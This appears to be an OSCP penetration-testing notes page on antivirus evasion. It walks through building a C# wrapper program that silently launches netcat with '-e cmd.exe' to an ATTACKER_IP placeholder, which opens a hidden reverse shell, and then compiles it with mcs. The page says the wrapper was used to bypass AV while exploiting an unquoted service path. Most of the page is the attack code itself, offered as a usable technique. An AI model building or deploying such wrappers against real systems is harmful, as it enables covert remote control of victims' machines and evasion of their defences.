// notes/ Pivoting & Tunneling
🚀
Av Evasion Executable Obfuscation
{% hint style="info" %}
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/av-evasion_executable-obfuscation ↗Executable Obfuscation
{% hint style="info" %} This technique was used to bypass AV while exploiting an Unquoted Service Path {% endhint %}
Make an executable using C#
csharp
01using System;02using System.Diagnostics;These lines give us access to basic system functions like start new processes (netcat)
csharp
01using System;02using System.Diagnostics;03 04namespace Wrapper{05 class Program{06 static void Main(){07 //Insert rest of code here!08 }09 }10}This is for initializing a namespace and class for the program itself
csharp
01using System;02using System.Diagnostics;03 04namespace Wrapper{05 class Program{06 static void Main(){07 Process proc = new Process();08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");09 }10 }11}This will start the new netcat process and set the parameters
csharp
01using System;02using System.Diagnostics;03 04namespace Wrapper{05 class Program{06 static void Main(){07 Process proc = new Process();08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");09 procInfo.CreateNoWindow = true;10 }11 }12}The next added line makes it NOT create a new window while starting
csharp
01using System;02using System.Diagnostics;03 04namespace Wrapper{05 class Program{06 static void Main(){07 Process proc = new Process();08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");09 procInfo.CreateNoWindow = true;10 proc.StartInfo = procInfo;11 proc.Start();12 }13 }14}The last added line will fire off the new process
Compile the source code
code
01mcs wrapper.cs